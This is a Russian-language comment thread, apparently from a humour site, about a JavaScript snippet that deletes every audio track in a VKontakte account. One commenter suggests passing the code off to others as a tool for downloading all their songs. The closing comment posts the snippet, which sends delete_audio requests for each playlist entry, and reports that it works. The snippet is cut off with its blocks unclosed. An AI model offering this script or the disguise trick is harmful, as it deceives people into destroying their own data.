А еще можно еще кому нибудь сказать что это код для скачивания всех песен в вк и наслаждаться.(и да я мразь)
раскрыть ветку (28)
раскрыть ветку (20)
раскрыть ветку (19)
раскрыть ветку (14)
Я гуманитарий. Я прочитала код. Вспомнила уроки программирования... короче, еще со школы знаю, что delete - удалить. А удалить можно все что угодно вплоть до винды, поэтому ну его нафиг! Мужа позову, пусть он разбирается, что эта шайтан-машина удалять вздумала.
раскрыть ветку (6)
Открою вам секрет, в коде который удаляет что либо, слово "delete" может не содержаться, более того, что оно там содержится краааайне редко.
раскрыть ветку (5)
раскрыть ветку (3)
хз. я знаю человека, которые по вопросу чё такое "please unistall previous version of this programm" не мог найти ответ
раскрыть ветку (2)
просто он в школе немецкий учил =) а если серьезно, то у вас в знакомых просто уникум какой-то)
раскрыть ветку (1)
нет. одноклассница. 10ый класс. ну как, она у меня спросила. мб и догадалась бы в гугл залезть, но я был видимо ближе
а есть те кто будет его читать? имхо большинство после первого взгляда подумают что это какая-то абракадабра и вчитываться не будут
Прочитает менее 1го процента. Вы серьезно думаете, что большинство понимает, что и как делает код в сабже ?
Вообще, реально на основе этого кода сделать так. Скачивать все песни, которые отображены.
раскрыть ветку (2)
раскрыть ветку (1)
поэтому список аудио нужно предварительно пролистать до конца - чтобы все аудио загрузились на страницу
ВОТ ЭТОТ РАБОТАЕТ - ВСЕ АУДИОЗАПИСИ УДАЛИЛИСЬ
var p=getAudioPlayer()._playlists;
for(var i=0;i<p.length;i++){
var l=p[i]._list;
for(var y=0;y<l.length;y++){
ajax.post('al_audio.php',{
act:'delete_audio',
oid:l[y][1],
aid:l[y][0],
hash:l[y][13].split('/')[3],
restore: 1
});